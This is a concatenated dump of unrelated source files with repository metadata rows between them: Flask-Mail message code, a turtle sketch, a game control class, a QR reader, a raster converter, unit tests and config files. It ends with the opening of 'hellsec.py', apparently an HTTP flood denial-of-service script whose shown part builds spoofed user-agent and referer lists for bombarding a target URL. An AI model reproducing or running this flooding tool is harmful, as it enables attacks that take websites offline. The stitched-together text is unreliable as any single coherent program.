:param alts: A dict or an iterable to go through dict() that contains
multipart alternatives
:param sender: email sender address, or **MAIL_DEFAULT_SENDER** by default
:param cc: CC list
:param bcc: BCC list
:param attachments: list of Attachment instances
:param reply_to: reply-to address
:param date: send date
:param charset: message character set
:param extra_headers: A dictionary of additional headers for the message
:param mail_options: A list of ESMTP options to be used in MAIL FROM
:param rcpt_options: A list of ESMTP options to be used in RCPT commands
:param subtype: Media subtype name for a message
"""
def __init__(self, subject='',
recipients=None,
body=None,
html=None,
alts=None,
sender=None,
cc=None,
bcc=None,
attachments=None,
reply_to=None,
date=None,
charset=None,
extra_headers=None,
mail_options=None,
rcpt_options=None,
subtype=None):
sender = sender or current_app.extensions['mail'].default_sender
if isinstance(sender, tuple):
sender = "%s <%s>" % sender
self.recipients = recipients or []
self.subject = subject
self.sender = sender
self.reply_to = reply_to
self.cc = cc or []
self.bcc = bcc or []
self.body = body
self.alts = dict(alts or {})
self.html = html
self.date = date
self.msgId = make_msgid()
self.charset = charset
self.extra_headers = extra_headers
self.subtype = subtype
self.mail_options = mail_options or []
self.rcpt_options = rcpt_options or []
self.attachments = attachments or []
@property
def recipients(self):
return self._recipients
@recipients.setter
def recipients(self, recipients):
self._recipients = fix_recipients_list(recipients)
@property
def cc(self):
return self._cc
@cc.setter
def cc(self, recipients):
self._cc = fix_recipients_list(recipients)
@property
def bcc(self):
return self._bcc
@bcc.setter
def bcc(self, recipients):
self._bcc = fix_recipients_list(recipients)
@property
def send_to(self):
return set(self.recipients) | set(self.bcc or ()) | set(self.cc or ())
@property
def html(self):
return self.alts.get('html')
@html.setter
def html(self, value):
if value is None:
self.alts.pop('html', None)
else:
self.alts['html'] = value
def _mimetext(self, text, subtype=None):
"""Creates a MIMEText object with the given subtype (default: 'plain')
If the text is unicode, the utf-8 charset is used.
"""
subtype = subtype or 'plain'
charset = self.charset or 'utf-8'
return MIMEText(text, _subtype=subtype, _charset=charset)
def _message(self):
"""Creates the email"""
ascii_attachments = current_app.extensions['mail'].ascii_attachments
encoding = self.charset or 'utf-8'
attachments = self.attachments or []
if len(attachments) == 0 and not self.alts:
# No html content and zero attachments means plain text
msg = self._mimetext(self.body, self.subtype)
elif len(attachments) > 0 and not self.alts:
# No html and at least one attachment means multipart
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
msg.attach(self._mimetext(self.body))
else:
# Anything else
subtype = self.subtype or 'mixed'
msg = MIMEMultipart(_subtype=subtype)
alternative = MIMEMultipart(_subtype='alternative')
alternative.attach(self._mimetext(self.body))
for mimetype, content in self.alts.items():
alternative.attach(self._mimetext(content, mimetype))
msg.attach(alternative)
if self.subject:
msg['Subject'] = sanitize_subject(force_text(self.subject),
encoding)
msg['From'] = sanitize_address(self.sender, encoding)
msg['To'] = ', '.join(
list(set(sanitize_addresses(self.recipients, encoding)))
)
msg['Date'] = formatdate(self.date, localtime=True)
# see RFC 5322 section 3.6.4.
msg['Message-ID'] = self.msgId
if self.cc:
msg['Cc'] = ', '.join(
list(set(sanitize_addresses(self.cc, encoding)))
)
if self.reply_to:
msg['Reply-To'] = sanitize_address(self.reply_to, encoding)
if self.extra_headers:
for k, v in self.extra_headers.items():
msg[k] = v
SPACES = re.compile(r'[\s]+', re.UNICODE)
for attachment in attachments:
f = MIMEBase(*attachment.content_type.split('/'))
f.set_payload(attachment.data)
encode_base64(f)
filename = attachment.filename
if filename and ascii_attachments:
# force filename to ascii
filename = unicodedata.normalize('NFKD', filename)
filename = filename.encode('ascii', 'ignore').decode('ascii')
filename = SPACES.sub(u' ', filename).strip()
try:
filename and filename.encode('ascii')
except UnicodeEncodeError:
if not PY3:
filename = filename.encode('utf8')
filename = ('UTF8', '', filename)
f.add_header('Content-Disposition',
attachment.disposition,
filename=filename)
for key, value in attachment.headers.items():
f.add_header(key, value)
if attachment.content_id:
try:
f.replace_header('Content-ID', attachment.content_id)
except KeyError:
f.add_header('Content-ID', attachment.content_id)
msg.attach(f)
if message_policy:
msg.policy = message_policy
return msg
def as_string(self):
return self._message().as_string()
def as_bytes(self):
return self._message().as_string().encode(self.charset or 'utf-8')
def __str__(self):
return self.as_string()
def __bytes__(self):
return self.as_bytes()
def has_bad_headers(self):
"""
Checks for bad headers i.e. newlines in subject, sender or recipients.
RFC5322 allows multiline CRLF with trailing whitespace (FWS) in headers
"""
headers = [self.sender, self.reply_to] + self.recipients
for header in headers:
if _has_newline(header):
return True
if self.subject:
if _has_newline(self.subject):
for linenum, line in enumerate(self.subject.split('\r\n')):
if not line:
return True
if linenum > 0 and line[0] not in '\t ':
return True
if _has_newline(line):
return True
if len(line.strip()) == 0:
return True
return False
def is_bad_headers(self):
from warnings import warn
warn(DeprecationWarning('is_bad_headers is deprecated, use the'
' new has_bad_headers method instead.'),
stacklevel=1)
return self.has_bad_headers()
def send(self, connection):
"""
Verifies and sends the message.
"""
return connection.send(self)
def add_recipient(self, recipient):
"""
Adds another recipient to the message.
:param recipient: email address of recipient.
"""
self.recipients.append(recipient)
def attach(self,
filename=None,
content_type=None,
data=None,
disposition=None,
headers=None,
content_id=None):
"""
Adds an attachment to the message.
:param filename: filename of attachment
:param content_type: file mimetype
:param data: the raw file data
:param disposition: content-disposition (if any)
:param content_id: content-id
"""
self.attachments.append(
Attachment(filename, content_type, data, disposition,
headers, content_id)
)
class _MailMixin(object):
@contextmanager
def record_messages(self):
"""
Records all messages. Use in unit tests for example::
with mail.record_messages() as outbox:
response = app.test_client.get("/email-sending-view/")
assert len(outbox) == 1
assert outbox[0].subject == "testing"
You must have blinker installed in order to use this feature.
:versionadded: 0.4
"""
if not email_dispatched:
raise RuntimeError("blinker must be installed")
outbox = []
def _record(message, app):
outbox.append(message)
email_dispatched.connect(_record)
try:
yield outbox
finally:
email_dispatched.disconnect(_record)
def send(self, message):
"""
Sends a single message instance. If TESTING is True the message will
not actually be sent.
:param message: a Message instance.
"""
with self.connect() as connection:
return message.send(connection)
def send_message(self, *args, **kwargs):
"""
Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
def connect(self):
"""
Opens a connection to the mail host.
"""
app = getattr(self, "app", None) or current_app
try:
return Connection(app.extensions['mail'])
except KeyError:
raise RuntimeError("The curent application was"
" not configured with Flask-Mail")
class _Mail(_MailMixin):
def __init__(self, server, username, password, port, use_tls, use_ssl,
default_sender, debug, max_emails, suppress,
ascii_attachments=False):
self.server = server
self.username = username
self.password = password
self.port = port
self.use_tls = use_tls
self.use_ssl = use_ssl
self.default_sender = default_sender
self.debug = debug
self.max_emails = max_emails
self.suppress = suppress
self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
"""
Manages email messaging
:param app: Flask instance
"""
def __init__(self, app=None):
self.app = app
if app is not None:
self.state = self.init_app(app)
else:
self.state = None
def init_mail(self, config, debug=False, testing=False):
return _Mail(
config.get('MAIL_SERVER', '127.0.0.1'),
config.get('MAIL_USERNAME'),
config.get('MAIL_PASSWORD'),
config.get('MAIL_PORT', 25),
config.get('MAIL_USE_TLS', False),
config.get('MAIL_USE_SSL', False),
config.get('MAIL_DEFAULT_SENDER'),
int(config.get('MAIL_DEBUG', debug)),
config.get('MAIL_MAX_EMAILS'),
config.get('MAIL_SUPPRESS_SEND', testing),
config.get('MAIL_ASCII_ATTACHMENTS', False)
)
def init_app(self, app):
"""Initializes your mail settings from the application settings.
You can use this if you want to set up your Mail instance
at configuration time.
:param app: Flask application instance
"""
state = self.init_mail(app.config, app.debug, app.testing)
# register extension with app
app.extensions = getattr(app, 'extensions', {})
app.extensions['mail'] = state
return state
def __getattr__(self, name):
return getattr(self.state, name, None)
signals = blinker.Namespace()
email_dispatched = signals.signal("email-dispatched", doc="""
Signal sent when an email is dispatched. This signal will also be sent
in testing mode, even though the email will not actually be sent.
""")
| [
"briancappello@gmail.com"
] | briancappello@gmail.com |
b6e2db285793968bc194f0cc1a2912dc59ad5622 | 8cadb441c5734c6dae2ed47419bd1ce5fac69afa | /13-파이썬기초_내장모듈2.py | bf78b99950cb5a27de4d0b30b38bf211c65a305d | [] | no_license | swj8905/Basic_Course_0904 | cf969a14ececacd369377bc9db611b639a4823a0 | 501620bb185851c3638d3b2029cc8259de67d770 | refs/heads/master | 2023-08-01T04:08:51.134526 | 2021-09-12T04:18:50 | 2021-09-12T04:18:50 | 402,959,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import turtle as t
t.shape("turtle")
for i in range(3):
t.forward(100)
t.left(120)
t.circle(50)
t.done() | [
"swj8905@naver.com"
] | swj8905@naver.com |
5f67ab5c03e5c44dd8eafab1df10221c656733c3 | 3a60b8935f809e300405214a66d949f0042e7e46 | /src/game/logic/player_control/player_control.py | 01107f77ef3e00a355c7b889bb6556490849130a | [] | no_license | stellarlib/centaurus | e71fe5c98b94e8e575d00e32f55ba39fe71799e6 | 896ae73165f3f44dfb87378ef2635d447ccbccae | refs/heads/master | 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,929 | py | from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
STD = 0
RANGED = 1
JUMP = 2
CHARGE = 3
str_to_enum = {
'std': STD,
'ranged': RANGED,
'jump': JUMP,
'charge': CHARGE,
}
action_cost = {
STD: MOVE_COST,
RANGED: RANGED_COST,
JUMP: JUMP_COST,
CHARGE: CHARGE_COST
}
def __init__(self, logic):
self.game = logic.game
self.logic = logic
cls = PlayerControl
self.mode = cls.STD
self.controls = {
cls.STD: StandardControl(self),
cls.RANGED: RangedControl(self),
cls.JUMP: JumpControl(self),
cls.CHARGE: ChargeControl(self)
}
self._player_turn = True
self._animating = False
@property
def player(self):
return self.logic.player
@property
def active(self):
return self._player_turn and not self._animating
@property
def button_map(self):
return self.game.buttons
#####################
# Routing input #
#################
def switch_mode(self, mode_name):
# this models the panel of buttons where the player toggles between action types
cls = PlayerControl
mode = cls.str_to_enum[mode_name]
if self.mode == mode:
self.mode = cls.STD
#print('switched to standard mode')
self.reset_mode_panel()
else:
cost = cls.action_cost[mode]
if cost > self.player.actions:
#print("can't switch to ", mode_name, " mode - insufficient player actions")
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
else:
self.mode = mode
self.controls[self.mode].init_mode()
# print('switched to ', mode_name, ' mode')
self.reset_mode_panel()
if mode_name != 'std':
button = self.button_map.get_button_by_id(mode_name)
button.button_down()
def reset_mode_panel(self):
[button.button_up() for button in self.button_map.get_button_group('action_mode')]
def handle_click(self, pos):
if self.active:
self.controls[self.mode].handle_click(pos)
def manual_switch_mode(self, mode_name):
if self.active:
self.switch_mode(mode_name)
else:
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
def manual_turn_end(self):
if self.active:
self.rest()
button = self.button_map.get_button_by_id('skip')
button.button_down()
def start_animating(self):
self._animating = True
def end_animating(self):
self._animating = False
##########################################################
# Player controls
####################
def move_player(self, pos):
def resolve_func():
self.spend_action(MOVE_COST)
self.end_animating()
self.start_animating()
self.player.start_move(pos, resolve_func)
def player_exits_level(self, pos):
def resolve_func():
self.end_animating()
self.player.travel_component.travel_to_next_level(pos)
# get next level according to pos
# get the new player pos on that level
# start the new level, put player in new pos
# refresh the turn so it is player start turn, full AP
self.start_animating()
self.player.start_exit_move(pos, resolve_func)
def jump_player(self, pos):
def resolve_func():
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump(pos, resolve_func)
def player_jump_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
def resolve_func():
self.player.melee_attack(foe)
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump_attack(pos, resolve_func)
def player_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(MELEE_COST)
self.end_animating()
self.start_animating()
self.player.start_melee_attack(foe, resolve_func)
def player_ranged_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(RANGED_COST)
self.end_animating()
self.player.start_ranged_attack(pos, resolve_func)
def charge_player(self, charge_path):
def resolve_func():
self.spend_action(CHARGE_COST)
self.end_animating()
self.start_animating()
self.player.start_charge(charge_path, resolve_func)
###################################################
# Game Logic #
##############
def spend_action(self, x):
self.switch_mode('std')
assert x <= self.player.actions
self.player.spend_actions(x)
if self.player.actions == 0:
self.end_turn()
def start_player_turn(self):
self._player_turn = True
self.set_up_turn()
def set_up_turn(self):
self.player.restore(2)
def tear_down_turn(self):
print('player turn over')
self.logic.start_ai_turn()
def end_turn(self):
self.tear_down_turn()
self._player_turn = False
def rest(self):
self.player.restore(1)
self.end_turn()
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
71fe371cda7d83fe8f25cf62601d8c71bf778d42 | 7c6598d32701acaa47e5a010504a47ea502061bd | /old_py/QRcode_demo_0.py | 68315b16bdf48c909721083c077b884dcb8e0245 | [] | no_license | markkua/RobotArm | fed669eb36a0b7c0be2f1b6023b839de9ac61540 | fe7dcdddb4757c5a2e79229d3c3e9fc5014c6043 | refs/heads/master | 2022-05-04T19:41:46.146579 | 2022-04-14T14:22:18 | 2022-04-14T14:22:18 | 198,443,105 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | # -*- encoding: utf-8 -*-
import cv2
import numpy as np
from pyzbar.pyzbar import decode
import cv2
import pyzbar.pyzbar as pyzbar
def decodeDisplay(image):
barcodes = pyzbar.decode(image)
for barcode in barcodes:
# 提取条形码的边界框的位置
# 画出图像中条形码的边界框
(x, y, w, h) = barcode.rect
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)
# 条形码数据为字节对象,所以如果我们想在输出图像上
# 画出来,就需要先将它转换成字符串
barcodeData = barcode.data.decode("utf-8")
barcodeType = barcode.type
# 绘出图像上条形码的数据和条形码类型
text = "{} ({})".format(barcodeData, barcodeType)
cv2.putText(image, text, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX,
.5, (0, 0, 125), 2)
# 向终端打印条形码数据和条形码类型
print("[INFO] Found {} barcode: {}".format(barcodeType, barcodeData))
return image
def detect():
camera = cv2.VideoCapture(0)
while True:
# 读取当前帧
ret, frame = camera.read()
# 转为灰度图像
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
im = decodeDisplay(gray)
cv2.imshow("camera", im)
key = cv2.waitKey(1)
if ord('q') == key:
break
camera.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
detect() | [
"markkua@live.com"
] | markkua@live.com |
c6a945a9af09303e35a60962d0884c7ad7e64f0a | 06129696dde15566e1a7a032f7f11c4f6bc4402a | /RasterToArray.py | 206af530b0c3a991d86fa1d95e079594f6a0cc12 | [] | no_license | NaomiBda/Remote_sensing_yields | caa8aa79aaf2818bf18bb46eb73bb96e3e02bc7d | 61f6d9a3bf38cb1b37c00d7dbb2d70e0d8d4bc30 | refs/heads/master | 2023-02-02T10:51:51.505262 | 2020-12-24T06:45:12 | 2020-12-24T06:45:12 | 246,301,699 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 12 14:24:13 2020
@author: naomiberda
"""
import rasterio as rio
import numpy as np
import pandas as pd
def noNa(path_drone):
"""
enleve les valeurs de nA
Prend comme reference limage drone
cree une liste de pixels nA (liste de liste)
path contient path+raster du drone
"""
src=rio.open(path_drone)
band1=src.read(1)
listeNa=[]
(n,m)=src.shape
for i in range(n):
for j in range(m):
if band1[i,j]<0:
listeNa+=[[i,j]]
return(listeNa)
def transform(path,raster,path_drone):
"""
transform un raster de taille n*m*b (b=nombre de bandes)
en un array de taille (n*m)*b (N*m colonnes, b lignes)
la premiere colonne est l id des pixels (i*j)
"""
listeNa=noNa(path_drone)
a=len(listeNa)
src=rio.open(path+raster)
b=src.count #nombre de bandes
(n,m)=src.shape #taille du raster
matrice=np.zeros((n*m-a,b+2)) #taille de la matrice
k=0 #nombre de pixels
for i in range(n):
for j in range(m):
if [i,j] not in listeNa:
matrice[k,0]=int(i)
matrice[k,1]=int(j)
for bands in range(b):
matrice[k,bands+2]=src.read(bands+1)[i,j]
k+=1
return(matrice)
def write_csv(path,matrice,header,formt):
"""
ecrit un csv à partir dune matrice et dune entete (une liste de deux listes de taille de la matrice)
path = path where to load the file
matrice : array
header = str : header
formt : format (int, float etc.. )
"""
np.savetxt(path+"matrice_indices.csv", matrice, delimiter=",",fmt=formt,header=header)
if __name__=='__main__':
#2018
# path='/Volumes/My Passport 1/TempNaomi/Donnees/Planet/plot 2018/'
#path_drone='/Volumes/My Passport 1/TempNaomi/Donnees/Drone/2018/Niakhar/2018_10_08/plot 2018/NDVI_norm_0/valuesModel/2018reprojetedrone.tif'
#raster='allindexesPlanet2018.tif'
#2019
path='/Volumes/My Passport 1/TempNaomi/Donnees/Planet/plot 2019/'
path_drone='/Volumes/My Passport 1/TempNaomi/Donnees/Drone/2019/Niakhar/19-09-05/plot 2019/NDVI_norm_0/valuesModel/drone2019projete.tif'
raster='Planetallindexes2019.tif'
#code
matrice=transform(path,raster,path_drone)
header='pixel line index,pixel column index,NDVI value, NDVI norm value,EVI value, GNDVI value,Excess green value, MSVAI value'
formt='%d','%d','%1.4f','%1.4f','%1.4f','%1.4f','%d','%1.4f' # '%d' means only integeer values , '%1.4f' means decimal with 4 figures
print(matrice)
write_csv(path,matrice,header,formt)
#write_csv(matrice,entete)
| [
"38361396+NaomiBda@users.noreply.github.com"
] | 38361396+NaomiBda@users.noreply.github.com |
815c76dd550f722378d6bff415d0149b9b990336 | e793d5a3554270823529f7463f42151fc1813e39 | /penzgtu/application.py | 1df9d96ad7917a6ebf9fe9ca96c4221610a971c2 | [] | no_license | VadimDunin/TestSeleniumSamples | bbd8e3bc7ead22286daafbed82a3173b7ce0afd2 | 9423c7009c9635702825a1f49411efe4e15ca13c | refs/heads/master | 2022-10-21T22:21:23.588118 | 2020-06-10T18:06:33 | 2020-06-10T18:06:33 | 271,199,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | from selenium.webdriver.chrome.webdriver import WebDriver
from main_page import MainPage
class Application:
def __init__(self):
self.app = WebDriver(executable_path="C:\Temp\ChromeDriver\83.exe")
self.app.implicitly_wait(5)
self.main_page = MainPage(self)
def quit(self):
self.app.quit()
def open_page(self):
self.app.get("http://www.penzgtu.ru") | [
"duninv@gmail.com"
] | duninv@gmail.com |
89fe64bb16e4911173adfeeedc5c0b370f1d07e4 | af2c6e555b9ecb67a6594ba8c7df308a12443a85 | /tests/unittests/test_read_from_file.py | d83465df683f176239a58ca5906fe393fb95edcb | [] | no_license | soulnai/internal | 97df543711e5daf62a5cfee92a29010d8442b9d0 | 887cef9b868c5f97f6463ce83d5af0795d8fe4bb | refs/heads/master | 2016-09-03T06:57:50.016593 | 2014-12-04T15:02:24 | 2014-12-04T15:02:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | #from __future__ import unicode_literals
from unittest import TestCase
import unittest
import mock
import game.io_
import StringIO
__author__ = 'avasilyev2'
TEST_TEXT = """
domain1.com
domain2.com
domain3.com
"""
class TestReadFromFile(TestCase):
def test_read_from_file(self):
my_mock = mock.MagicMock(spec=file)
with mock.patch('__builtin__.open', mock.mock_open(read_data=TEST_TEXT), create=True):
lines = game.io_.read_from_file(my_mock)
self.assertEquals(lines, TEST_TEXT.strip().splitlines())
def test_get_answer(self):
f = ["12\n", "23\n", "34\n"]
ret = game.io_.get_answer(f)
self.assertIsInstance(ret, list, "List should be returned")
def test_get_guess(self):
f = ["12345\n", "12346\n", "12347\n"]
ret = game.io_.get_guess(f)
self.assertIsInstance(ret, str, "Str should be returned")
pass
if __name__ == '__main__':
unittest.main() | [
"soulnai@gmail.com"
] | soulnai@gmail.com |
edd5de10db555203eeb30040b17b795764b8f079 | 41bfb83fdbfe8114b4b709da1931a30278c2370a | /fairlearn/post_processing/__init__.py | f7f7d0cc4e7af444dc88f63c764a8cba29b359c0 | [
"MIT"
] | permissive | seongl/fairlearn | 6e95d5bd6eb7498a12be68000279a79767c78b57 | 4f8dddad9fe24a914db4ffd3a2f699e3248c46c5 | refs/heads/master | 2020-08-14T12:24:58.839830 | 2019-10-14T17:38:30 | 2019-10-14T17:38:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .post_processing import PostProcessing # noqa: F401
from .threshold_optimizer import ThresholdOptimizer # noqa: F401
| [
"noreply@github.com"
] | seongl.noreply@github.com |
bd5b68d31c1dfff4c57d83ec3c12c7d3a1751700 | 681ad82b3c7f18411f83a4be2c190a7cd123ce8a | /EDBRCommon/python/datasets/cmgTupleList_XWW/cmgTuple_0314_CA8/cmgTuple_RSG_WW_lvjj_c0p2_M600_xww_cff.py | 0942c55b6711dc8ad9941a5bd92959d18d54163b | [] | no_license | cms-edbr/ExoDiBosonResonances | 5009161fdc76b39f121316e26497bedd29abe3d7 | b8ae400a20bfb8ed66c83b8f38e98d853058ae17 | refs/heads/master | 2021-01-19T18:33:17.435519 | 2014-03-12T12:00:43 | 2014-03-12T12:00:43 | 12,613,661 | 0 | 0 | null | 2015-10-18T15:06:39 | 2013-09-05T09:06:16 | Python | UTF-8 | Python | false | false | 1,101 | py | import FWCore.ParameterSet.Config as cms
cmgFiles = cms.untracked.vstring()
source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
duplicateCheckMode = cms.untracked.string("noDuplicateCheck"),
fileNames = cmgFiles
)
cmgFiles.extend([
'/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_0.root',
'/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_1.root',
'/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_2.root',
'/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_3.root',
'/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_4.root',
])
| [
""
] | |
2c95291499f567de5b404c3a0497041dbf0cbaf3 | 0872dbbd571aa2b4a4fe1dc7174f74108be7c653 | /hellsec.py | 9030e328abd1822959abe9ac494dfc544c39c391 | [] | no_license | JOJO123218/PythonDDOS-Scripts-Fixed | fe85d5e077c24297312d52d0a956cdf17b4e24cb | 7354ff12bf43abfa68175ca2a72d48bbaa8fd00e | refs/heads/main | 2023-07-31T23:01:17.386562 | 2021-10-04T15:10:46 | 2021-10-04T15:10:46 | 413,472,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56,936 | py | # -*- coding: utf-8 -*-
# coding: utf-8
# coding: latin-1
from urllib.request import urlopen, HTTPError, URLError
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=45
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
